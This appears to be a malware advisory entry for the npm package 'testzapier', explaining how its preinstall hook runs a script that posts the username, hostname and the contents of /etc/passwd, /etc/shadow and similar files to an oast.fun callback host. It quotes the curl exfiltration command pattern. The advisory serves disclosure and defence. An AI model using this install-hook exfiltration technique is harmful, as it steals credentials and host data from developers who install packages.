MAL-2026-5575

    Dashboard / Malicious Package / MAL-2026-5575

    MAL-2026-5575

    Published: 11 Jun 2026Last Modified: 15 Jul 2026Aliases: 
    GHSA-5ppv-rxq4-cf57

    Summary: Malicious code in testzapier (npm)

    Details: Source: amazon-inspector (a5840f2a3b34d7f32de7243a146ecf85ac875bd1ef09b0ba9a395d08e356084f) package.json declares a preinstall hook (`node index.js`) that fires automatically on `npm install`. index.js spawns a shell that runs `curl -X POST` against `http://kpfdtycruuyszysbsjtoj9al6djfqrtve.oast.fun/noderedactedsdk/$(whoami)/$(hostname)/`, embedding the installer's username and hostname in the URL path. The User-Agent header carries a base64-encoded blob containing the contents of /etc/passwd, /etc/hosts, /etc/shadow (when readable as root), and the output of `id`. The destination is an interactsh/oast.fun OOB-callback subdomain, plain HTTP, with no relationship to any documented package purpose. Installer harm is direct and unconditional: any machine running `npm install testzapier` leaks host identity and local-account/secret-file contents to the attacker. Source: ghsa-malware (660ed463d49d2702aff017efd42f11c8406d23cd9cae3aae7ae5640273e78dcc) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

    Affected packages

    Package

    Name: testzapier

    Purl: pkg:npm/testzapier

    Affected ranges

    Type: SEMVER

    Events:

    Introduced- 0
    Fixed -None

    Affected versions

    1.0.1
    1.0.0
    MAL-2026-5575 | CVE-DB